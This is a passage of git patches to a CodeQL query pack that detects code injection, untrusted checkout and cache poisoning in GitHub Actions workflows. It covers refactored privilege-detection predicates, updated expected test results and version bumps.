toJSON(github.event.issue) | ${{ toJSON(github.event.issue) }} | | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | ${{ toJSON(github.event) }} | +| .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | ${{ toJSON(github.event.comment.body).foo }} | | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | ${{ github.event.workflow_run.display_title }} | | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | ${{ github.event.workflow_run.head_commit.message }} | | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | ${{ github.event.workflow_run.head_commit.author.email }} | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected index c69af0316bf5..d577e2fd732b 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected @@ -234,6 +234,7 @@ nodes | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | semmle.label | toJSON(github.event.comment) | | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | semmle.label | toJSON(github.event.issue) | | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | semmle.label | toJSON(github.event) | +| .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | semmle.label | toJSON(github.event.comment.body).foo | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | From 842b741611788964c82caad40ce785ff56305c3b Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 31 May 2024 16:02:51 +0200 Subject: [PATCH 311/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 2736e30331c2..84f18e2b5210 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: githubsecuritylab/actions-all -version: 0.0.30 +version: 0.0.31 dependencies: codeql/util: ^0.2.0 codeql/yaml: ^0.1.2 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 451b49ec07e9..4a196108be6b 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: githubsecuritylab/actions-queries -version: 0.0.30 +version: 0.0.31 groups: - actions - queries From 844b6e014bb6aef8c48ba86caba0ed3f34b95480 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 31 May 2024 19:04:32 +0200 Subject: [PATCH 312/707] Bump qlpack versions --- ql/lib/codeql/actions/ast/internal/Ast.qll | 10 +++++++--- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- .../CWE-829/UntrustedCheckoutCritical.expected | 2 -- .../Security/CWE-829/UntrustedCheckoutMedium.expected | 2 ++ 5 files changed, 11 insertions(+), 7 deletions(-) diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index 1094a152126b..2b15061be3d4 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -818,8 +818,9 @@ class JobImpl extends AstNodeImpl, TJobNode { } private predicate hasPrivilegedTrigger() { - // the Job is triggered by an event other than `pull_request` + // the Job is triggered by an event other than `pull_request`, `push`, or `workflow_call` count(this.getATriggerEvent()) = 1 and + not this.getATriggerEvent().getName() = "push" and not this.getATriggerEvent().getName() = "pull_request" and not this.getATriggerEvent().getName() = "workflow_call" or @@ -832,8 +833,11 @@ class JobImpl extends AstNodeImpl, TJobNode { not exists(this.getEnclosingWorkflow().(ReusableWorkflowImpl).getACaller()) ) or - // the Workflow has multiple triggers so at least one is not "pull_request" - count(this.getATriggerEvent()) > 1 + // the Job is triggered by an event other than `push`, `pull_request`, or `workflow_call` + exists(string event | + this.getATriggerEvent().getName() = event and + not event = ["push", "pull_request", "workflow_call"] + ) } /** Gets the trigger event that starts this workflow. */ diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 84f18e2b5210..9acfb3035a41 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: githubsecuritylab/actions-all -version: 0.0.31 +version: 0.0.32 dependencies: codeql/util: ^0.2.0 codeql/yaml: ^0.1.2 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 4a196108be6b..5637bef68a03 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: githubsecuritylab/actions-queries -version: 0.0.31 +version: 0.0.32 groups: - actions - queries diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index 2660a726ab6f..1f90c56607df 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected @@ -1,7 +1,5 @@ | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/dependabot1.yml:15:9:19:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/dependabot1.yml:39:9:43:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/gitcheckout.yml:10:11:18:8 | Run Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/level0.yml:99:9:103:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/level0.yml:125:9:129:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected index e69de29bb2d1..9adfa3cee7cc 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected @@ -0,0 +1,2 @@ +| .github/workflows/dependabot1.yml:15:9:19:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/dependabot1.yml:39:9:43:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | From 88465bd0e350b1da1ff468a96af6d04f85a86dab Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 3 Jun 2024 11:26:51 +0200 Subject: [PATCH 313/707] Improve privleged detection --- ql/lib/codeql/actions/Ast.qll | 12 +- ql/lib/codeql/actions/Helper.qll | 46 +--- ql/lib/codeql/actions/ast/internal/Ast.qll | 209 ++++++++++-------- ql/src/Security/CWE-349/CachePoisoning.ql | 2 +- .../CWE-349/CachePoisoningByCodeInjection.ql | 2 +- .../CWE-094/CodeInjectionCritical.expected | 1 - .../CWE-094/CodeInjectionMedium.expected | 1 + 7 files changed, 138 insertions(+), 135 deletions(-) diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 9be2580f36e9..e837c6fcb303 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -77,6 +77,8 @@ class CompositeAction extends AstNode instanceof CompositeActionImpl { LocalJob getACaller() { result = super.getACaller() } predicate isPrivileged() { super.isPrivileged() } + + predicate isPrivilegedExternallyTriggerable() { super.isPrivilegedExternallyTriggerable() } } /** @@ -169,6 +171,10 @@ class Event extends AstNode instanceof EventImpl { string getAPropertyValue(string prop) { result = super.getAPropertyValue(prop) } predicate hasProperty(string prop) { super.hasProperty(prop) } + + predicate isExternallyTriggerable() { super.isExternallyTriggerable() } + + predicate isPrivileged() { super.isPrivileged() } } /** @@ -198,11 +204,11 @@ abstract class Job extends AstNode instanceof JobImpl { Strategy getStrategy() { result = super.getStrategy() } - predicate isPrivileged() { super.isPrivileged() } + string getARunsOnLabel() { result = super.getARunsOnLabel() } - predicate isExternallyTriggerable() { super.isExternallyTriggerable() } + predicate isPrivileged() { super.isPrivileged() } - string getARunsOnLabel() { result = super.getARunsOnLabel() } + predicate isPrivilegedExternallyTriggerable() { super.isPrivilegedExternallyTriggerable() } } class LocalJob extends Job instanceof LocalJobImpl { diff --git a/ql/lib/codeql/actions/Helper.qll b/ql/lib/codeql/actions/Helper.qll index 563a9800214e..401ba89eca77 100644 --- a/ql/lib/codeql/actions/Helper.qll +++ b/ql/lib/codeql/actions/Helper.qll @@ -210,54 +210,28 @@ predicate writeToGitHubPath(Run run, string content) { predicate inPrivilegedCompositeAction(AstNode node) { exists(CompositeAction a | - // node is in a privileged composite action a = node.getEnclosingCompositeAction() and - ( - a.isPrivileged() - or - exists(Job caller | - caller = a.getACaller() and - caller.isPrivileged() and - caller.isExternallyTriggerable() - ) - ) - ) -} - -predicate inPrivilegedExternallyTriggerableJob(AstNode node) { - exists(Job j | - // node is in a privileged and externally triggereable job - j = node.getEnclosingJob() and - // job is privileged (write access or access to secrets) - j.isPrivileged() and - // job is triggereable by an external user - j.isExternallyTriggerable() + a.isPrivilegedExternallyTriggerable() ) } predicate inNonPrivilegedCompositeAction(AstNode node) { exists(CompositeAction a | - // node is in a non-privileged composite action a = node.getEnclosingCompositeAction() and - not a.isPrivileged() and - not exists(LocalJob caller | - caller = a.getACaller() and - caller.isPrivileged() and - caller.isExternallyTriggerable() - ) + not a.isPrivilegedExternallyTriggerable() + ) +} + +predicate inPrivilegedExternallyTriggerableJob(AstNode node) { + exists(Job j | + j = node.getEnclosingJob() and + j.isPrivilegedExternallyTriggerable() ) } predicate inNonPrivilegedJob(AstNode node) { exists(Job j | - // node is in a non-privileged or not externally triggereable job j = node.getEnclosingJob() and - ( - // job is non-privileged (no write access and no access to secrets) - not j.isPrivileged() - or - // job is triggereable by an external user - not j.isExternallyTriggerable() - ) + not j.isPrivilegedExternallyTriggerable() ) } diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index 2b15061be3d4..e31edf7900af 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -317,6 +317,18 @@ class CompositeActionImpl extends AstNodeImpl, TCompositeAction { ) } + private predicate hasExplicitSecretAccess() { + // the job accesses a secret other than GITHUB_TOKEN + exists(SecretsExpressionImpl expr | + expr.getEnclosingCompositeAction() = this and not expr.getFieldName() = "GITHUB_TOKEN" + ) + } + + private predicate hasExplicitWritePermission() { + // a calling job has an explicit write permission + this.getACaller().getPermissions().getAPermission().matches("%write") + } + /** Holds if the action is privileged. */ predicate isPrivileged() { // there is a calling job that defines explicit write permissions @@ -326,19 +338,24 @@ class CompositeActionImpl extends AstNodeImpl, TCompositeAction { this.hasExplicitSecretAccess() or // there is a privileged caller job - this.getACaller().isPrivileged() - } - - private predicate hasExplicitSecretAccess() { - // the job accesses a secret other than GITHUB_TOKEN - exists(SecretsExpressionImpl expr | - expr.getEnclosingCompositeAction() = this and not expr.getFieldName() = "GITHUB_TOKEN" + ( + this.getACaller().isPrivileged() + or + not this.getACaller().isPrivileged() and + this.getACaller().getATriggerEvent().isPrivileged() ) } - private predicate hasExplicitWritePermission() { - // a calling job has an explicit write permission - this.getACaller().getPermissions().getAPermission().matches("%write") + /** Holds if the action is privileged and externally triggerable. */ + predicate isPrivilegedExternallyTriggerable() { + // the action is externally triggerable + exists(JobImpl caller, EventImpl event | + caller = this.getACaller() and + event = caller.getATriggerEvent() and + event.isExternallyTriggerable() and + // the action is privileged + (this.isPrivileged() or caller.isPrivileged()) + ) } } @@ -688,6 +705,42 @@ class EventImpl extends AstNodeImpl, TEventNode { /** Holds if the event has a property with the given name */ predicate hasProperty(string prop) { exists(this.getAPropertyValue(prop)) } + + /** Holds if the event can be triggered by an external actor. */ + predicate isExternallyTriggerable() { + // the job is triggered by an event that can be triggered externally + externallyTriggerableEventsDataModel(this.getName()) + or + // the event is `workflow_call` and there is a caller workflow that can be triggered externally + this.getName() = "workflow_call" and + ( + // there are hints that this workflow is meant to be called by external triggers + exists(ExpressionImpl expr, string external_trigger | + expr.getEnclosingWorkflow() = this.getEnclosingWorkflow() and + expr.getExpression().matches("%github.event" + external_trigger + "%") and + externallyTriggerableEventsDataModel(external_trigger) + ) + or + this.getEnclosingWorkflow() + .(ReusableWorkflowImpl) + .getACaller() + .getATriggerEvent() + .isExternallyTriggerable() + ) + } + + predicate isPrivileged() { + // the Job is triggered by an event other than `pull_request`, or `workflow_call` + not this.getName() = "pull_request" and + not this.getName() = "workflow_call" + or + // Reusable Workflow with a privileged caller or we cant find a caller + this.getName() = "workflow_call" and + ( + this.getEnclosingWorkflow().(ReusableWorkflowImpl).getACaller().isPrivileged() or + not exists(this.getEnclosingWorkflow().(ReusableWorkflowImpl).getACaller()) + ) + } } class JobImpl extends AstNodeImpl, TJobNode { @@ -746,45 +799,41 @@ class JobImpl extends AstNodeImpl, TJobNode { /** Gets the strategy for this job. */ StrategyImpl getStrategy() { result.getNode() = n.lookup("strategy") } - /** Holds if the job can be triggered by an external actor. */ - predicate isExternallyTriggerable() { - // the job is triggered by an event that can be triggered externally - externallyTriggerableEventsDataModel(this.getATriggerEvent().getName()) - or - // the job is triggered by a workflow_call event that can be triggered externally - this.getATriggerEvent().getName() = "workflow_call" and - ( - exists(ExpressionImpl e, string external_trigger | - e.getEnclosingJob() = this and - e.getExpression().matches("%github.event" + external_trigger + "%") and - externallyTriggerableEventsDataModel(external_trigger) + /** Gets the trigger event that starts this workflow. */ + EventImpl getATriggerEvent() { result = this.getEnclosingWorkflow().getATriggerEvent() } + + // private predicate hasSingleTrigger(string trigger) { + // this.getATriggerEvent().getName() = trigger and + // count(this.getATriggerEvent()) = 1 + // } + /** Gets the runs-on field of the job. */ + string getARunsOnLabel() { + exists(ScalarValueImpl lbl, YamlMappingLikeNode runson | + runson = n.lookup("runs-on").(YamlMappingLikeNode) + | + ( + lbl.getNode() = runson.getNode(_) and + not lbl.getNode() = runson.getNode("group") + or + lbl.getNode() = runson.getNode("labels").(YamlMappingLikeNode).getNode(_) + ) and + ( + not exists(MatrixExpressionImpl e | e.getParentNode() = lbl) and + result = + lbl.getValue() + .trim() + .regexpReplaceAll("^('|\")", "") + .regexpReplaceAll("('|\")$", "") + .trim() + or + exists(MatrixExpressionImpl e | + e.getParentNode() = lbl and + result = e.getLiteralValues() + ) ) - or - this.getEnclosingWorkflow().(ReusableWorkflowImpl).getACaller().isExternallyTriggerable() ) } - /** Holds if the job is privileged. */ - predicate isPrivileged() { - // the job has privileged runtime permissions - this.hasRuntimeWritePermissions() - or - // the job has an explicit secret accesses - this.hasExplicitSecretAccess() - or - // the job has an explicit write permission - this.hasExplicitWritePermission() - or - // the job has no explicit permissions but the workflow has write permissions - not exists(this.getPermissions()) and - this.hasImplicitWritePermission() - or - // neither the job nor the workflow have permissions but the job has a privileged trigger - not exists(this.getPermissions()) and - not exists(this.getEnclosingWorkflow().getPermissions()) and - this.hasPrivilegedTrigger() - } - private predicate hasExplicitSecretAccess() { // the job accesses a secret other than GITHUB_TOKEN exists(SecretsExpressionImpl expr | @@ -817,60 +866,34 @@ class JobImpl extends AstNodeImpl, TJobNode { ) } - private predicate hasPrivilegedTrigger() { - // the Job is triggered by an event other than `pull_request`, `push`, or `workflow_call` - count(this.getATriggerEvent()) = 1 and - not this.getATriggerEvent().getName() = "push" and - not this.getATriggerEvent().getName() = "pull_request" and - not this.getATriggerEvent().getName() = "workflow_call" + /** Holds if the job is privileged. */ + predicate isPrivileged() { + // the job has privileged runtime permissions + this.hasRuntimeWritePermissions() or - // the Workflow is a Reusable Workflow only and there is - // a privileged caller workflow or we cant find a caller - count(this.getATriggerEvent()) = 1 and - this.getATriggerEvent().getName() = "workflow_call" and - ( - this.getEnclosingWorkflow().(ReusableWorkflowImpl).getACaller().isPrivileged() or - not exists(this.getEnclosingWorkflow().(ReusableWorkflowImpl).getACaller()) - ) + // the job has an explicit secret accesses + this.hasExplicitSecretAccess() or - // the Job is triggered by an event other than `push`, `pull_request`, or `workflow_call` - exists(string event | - this.getATriggerEvent().getName() = event and - not event = ["push", "pull_request", "workflow_call"] - ) + // the job has an explicit write permission + this.hasExplicitWritePermission() + or + // the job has no explicit permissions but the workflow has write permissions + not exists(this.getPermissions()) and + this.hasImplicitWritePermission() } - /** Gets the trigger event that starts this workflow. */ - EventImpl getATriggerEvent() { result = this.getEnclosingWorkflow().getATriggerEvent() } - - // private predicate hasSingleTrigger(string trigger) { - // this.getATriggerEvent().getName() = trigger and - // count(this.getATriggerEvent()) = 1 - // } - /** Gets the runs-on field of the job. */ - string getARunsOnLabel() { - exists(ScalarValueImpl lbl, YamlMappingLikeNode runson | - runson = n.lookup("runs-on").(YamlMappingLikeNode) - | + /** Holds if the action is privileged and externally triggerable. */ + predicate isPrivilegedExternallyTriggerable() { + exists(EventImpl e | + // job is triggereable by an external user + this.getATriggerEvent() = e and + e.isExternallyTriggerable() and + // job is privileged (write access or access to secrets) ( - lbl.getNode() = runson.getNode(_) and - not lbl.getNode() = runson.getNode("group") + this.isPrivileged() or - lbl.getNode() = runson.getNode("labels").(YamlMappingLikeNode).getNode(_) - ) and - ( - not exists(MatrixExpressionImpl e | e.getParentNode() = lbl) and - result = - lbl.getValue() - .trim() - .regexpReplaceAll("^('|\")", "") - .regexpReplaceAll("('|\")$", "") - .trim() - or - exists(MatrixExpressionImpl e | - e.getParentNode() = lbl and - result = e.getLiteralValues() - ) + not this.isPrivileged() and + e.isPrivileged() ) ) } diff --git a/ql/src/Security/CWE-349/CachePoisoning.ql b/ql/src/Security/CWE-349/CachePoisoning.ql index 80ebd92c5d31..d81c13021c17 100644 --- a/ql/src/Security/CWE-349/CachePoisoning.ql +++ b/ql/src/Security/CWE-349/CachePoisoning.ql @@ -24,7 +24,7 @@ where // TODO: Consider adding artifact downloads as a potential source of cache poisoning j.getAStep() = checkout and // job can be triggered by an external user - j.isExternallyTriggerable() and + j.getATriggerEvent().isExternallyTriggerable() and ( // the job writes to the cache // (No need to follow the checkout step as the cache writing is normally done after the job completes) diff --git a/ql/src/Security/CWE-349/CachePoisoningByCodeInjection.ql b/ql/src/Security/CWE-349/CachePoisoningByCodeInjection.ql index 1c13497ddaf2..5ed3c966ad31 100644 --- a/ql/src/Security/CWE-349/CachePoisoningByCodeInjection.ql +++ b/ql/src/Security/CWE-349/CachePoisoningByCodeInjection.ql @@ -22,7 +22,7 @@ where CodeInjectionFlow::flowPath(source, sink) and j = sink.getNode().asExpr().getEnclosingJob() and // job can be triggered by an external user - j.isExternallyTriggerable() and + j.getATriggerEvent().isExternallyTriggerable() and // excluding privileged workflows since they can be easily exploited in similar circumstances not j.isPrivileged() and // The workflow runs in the context of the default branch diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected index 484121163634..a65f85d0486f 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected @@ -261,7 +261,6 @@ nodes subpaths #select | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | -| .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | | .github/actions/action5/action.yml:16:19:16:55 | github.event.pull_request.body | .github/actions/action5/action.yml:16:19:16:55 | github.event.pull_request.body | .github/actions/action5/action.yml:16:19:16:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action5/action.yml:16:19:16:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | ${{steps.remove_quotations.outputs.replaced}} | | .github/workflows/artifactpoisoning1.yml:34:67:34:92 | steps.pr.outputs.id | .github/workflows/artifactpoisoning1.yml:14:9:20:6 | Uses Step | .github/workflows/artifactpoisoning1.yml:34:67:34:92 | steps.pr.outputs.id | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning1.yml:34:67:34:92 | steps.pr.outputs.id | ${{ steps.pr.outputs.id }} | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected index d577e2fd732b..804c4f1df6c2 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected @@ -260,6 +260,7 @@ nodes | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | semmle.label | github.event.workflow_run.head_repository.description | subpaths #select +| .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | | .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | | .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | .github/workflows/changed-files.yml:15:9:18:6 | Uses Step: changed-files1 | .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | ${{ steps.changed-files1.outputs.all_changed_files }} | | .github/workflows/changed-files.yml:40:24:40:76 | steps.changed-files3.outputs.all_changed_files | .github/workflows/changed-files.yml:33:9:38:6 | Uses Step: changed-files3 | .github/workflows/changed-files.yml:40:24:40:76 | steps.changed-files3.outputs.all_changed_files | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/changed-files.yml:40:24:40:76 | steps.changed-files3.outputs.all_changed_files | ${{ steps.changed-files3.outputs.all_changed_files }} | From a5c6df3070810e34500a5986b275ee1559cca432 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 3 Jun 2024 18:13:01 +0200 Subject: [PATCH 314/707] Move from yaml to js extractor --- .!79690!.DS_Store | 0 ql/lib/codeql-pack.lock.yml | 22 +++-- .../codeql/actions/dataflow/ExternalFlow.qll | 18 ++--- .../internal/ExternalFlowExtensions.qll | 6 +- ql/lib/ext/8398a7_action-slack.model.yml | 2 +- ...rSource_sonarcloud-github-action.model.yml | 2 +- ql/lib/ext/actions_github-script.model.yml | 2 +- ...ahmadnassri_action-changed-files.model.yml | 2 +- ql/lib/ext/akhileshns_heroku-deploy.model.yml | 4 +- ...nnn_action-semantic-pull-request.model.yml | 2 +- ql/lib/ext/anchore_sbom-action.model.yml | 2 +- ql/lib/ext/anchore_scan-action.model.yml | 2 +- .../ext/andresz1_size-limit-action.model.yml | 2 +- .../android-actions_setup-android.model.yml | 2 +- ...le-actions_import-codesign-certs.model.yml | 2 +- ql/lib/ext/asdf-vm_actions.model.yml | 2 +- ...taylor_read-json-property-action.model.yml | 2 +- ...ley-taylor_regex-property-action.model.yml | 2 +- .../aszc_change-string-case-action.model.yml | 2 +- ...ctions_configure-aws-credentials.model.yml | 2 +- .../axel-op_googlejavaformat-action.model.yml | 2 +- ql/lib/ext/azure_powershell.model.yml | 2 +- ql/lib/ext/bahmutov_npm-install.model.yml | 2 +- .../blackducksoftware_github-action.model.yml | 2 +- ql/lib/ext/bobheadxi_deployments.model.yml | 2 +- .../bufbuild_buf-breaking-action.model.yml | 4 +- ql/lib/ext/bufbuild_buf-lint-action.model.yml | 4 +- .../ext/bufbuild_buf-setup-action.model.yml | 2 +- ql/lib/ext/cachix_cachix-action.model.yml | 4 +- ql/lib/ext/changesets_action.model.yml | 2 +- .../ext/cloudflare_wrangler-action.model.yml | 2 +- ql/lib/ext/coursier_cache-action.model.yml | 2 +- .../crazy-max_ghaction-chocolatey.model.yml | 2 +- .../crazy-max_ghaction-import-gpg.model.yml | 2 +- .../csexton_release-asset-action.model.yml | 2 +- ...cycjimmy_semantic-release-action.model.yml | 2 +- ql/lib/ext/cypress-io_github-action.model.yml | 2 +- .../ext/dailydotdev_action-devcard.model.yml | 2 +- ...me_reportgenerator-github-action.model.yml | 2 +- .../daspn_private-actions-checkout.model.yml | 2 +- .../dawidd6_action-ansible-playbook.model.yml | 2 +- ...dawidd6_action-download-artifact.model.yml | 2 +- ql/lib/ext/delaguardo_setup-clojure.model.yml | 2 +- ...tesystems_magic-nix-cache-action.model.yml | 2 +- ...er-practice_actions-setup-docker.model.yml | 2 +- ql/lib/ext/docker_build-push-action.model.yml | 2 +- ql/lib/ext/endbug_latest-tag.model.yml | 2 +- ql/lib/ext/expo_expo-github-action.model.yml | 2 +- ...seextended_action-hosting-deploy.model.yml | 2 +- .../frabert_replace-string-action.model.yml | 2 +- ...nzdiebold_github-env-vars-action.model.yml | 2 +- ql/lib/ext/gabrielbb_xvfb-action.model.yml | 2 +- ql/lib/ext/game-ci_unity-builder.model.yml | 2 +- .../ext/game-ci_unity-test-runner.model.yml | 2 +- ...autamkrishnar_blog-post-workflow.model.yml | 2 +- ...ctions_actions-runner-controller.model.yml | 2 +- .../composite-actions/adap_flower.model.yml | 2 +- .../agoric_agoric-sdk.model.yml | 2 +- .../airbnb_lottie-ios.model.yml | 2 +- .../airbytehq_airbyte.model.yml | 2 +- .../amazon-ion_ion-java.model.yml | 2 +- .../composite-actions/anchore_grype.model.yml | 2 +- .../composite-actions/anchore_syft.model.yml | 2 +- .../angular_dev-infra.model.yml | 2 +- .../ansible_ansible-lint.model.yml | 2 +- .../composite-actions/ansible_awx.model.yml | 2 +- .../apache_arrow-datafusion.model.yml | 2 +- .../apache_arrow-rs.model.yml | 2 +- .../composite-actions/apache_arrow.model.yml | 2 +- .../apache_bookkeeper.model.yml | 2 +- .../composite-actions/apache_brpc.model.yml | 2 +- .../apache_camel-k.model.yml | 2 +- .../composite-actions/apache_camel.model.yml | 2 +- .../composite-actions/apache_flink.model.yml | 2 +- .../apache_incubator-kie-tools.model.yml | 2 +- .../composite-actions/apache_nuttx.model.yml | 2 +- .../apache_opendal.model.yml | 2 +- .../composite-actions/apache_pekko.model.yml | 2 +- .../apache_pulsar-helm-chart.model.yml | 2 +- .../apache_superset.model.yml | 2 +- 